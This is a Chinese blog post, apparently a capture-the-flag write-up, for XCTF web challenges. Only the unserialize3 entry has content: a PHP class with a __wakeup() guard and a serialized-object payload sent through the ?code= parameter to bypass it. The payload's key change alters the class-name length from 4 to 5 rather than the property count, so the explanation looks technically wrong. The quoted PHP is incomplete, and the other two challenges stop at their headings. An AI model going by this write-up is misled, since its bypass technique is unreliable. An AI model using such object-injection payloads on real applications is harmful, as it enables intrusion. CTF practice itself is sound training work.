您当前的位置: 首页 > 

姜小孩.

暂无认证

  • 4浏览

    0关注

    51博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

攻防世界刷题unserialize3、favorite_number、cat

姜小孩. 发布时间:2022-04-26 14:28:40 ,浏览量:4

今天又是去排练的一天,趁还没去做点题吧

目录

unserialize3

favorite_number

cat

 

unserialize3
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=

好简单的一个反序列化,绕过wakeup就行了

poc:  

php运行一下得到

O:4:"xctf":1:{s:4:"flag";s:3:"111";}

为了绕过wakeup我们改成

O:5:"xctf":1:{s:4:"flag";s:3:"111";}

最后

?code=O:5:"xctf":1:{s:4:"flag";s:3:"111";}

拿下,这个题一开始看那么简单就没仔细看,结果少了个花括号。就报错,,,,,

favorite_number

附代码

            
关注
打赏
1652274937
查看更多评论
0.2447s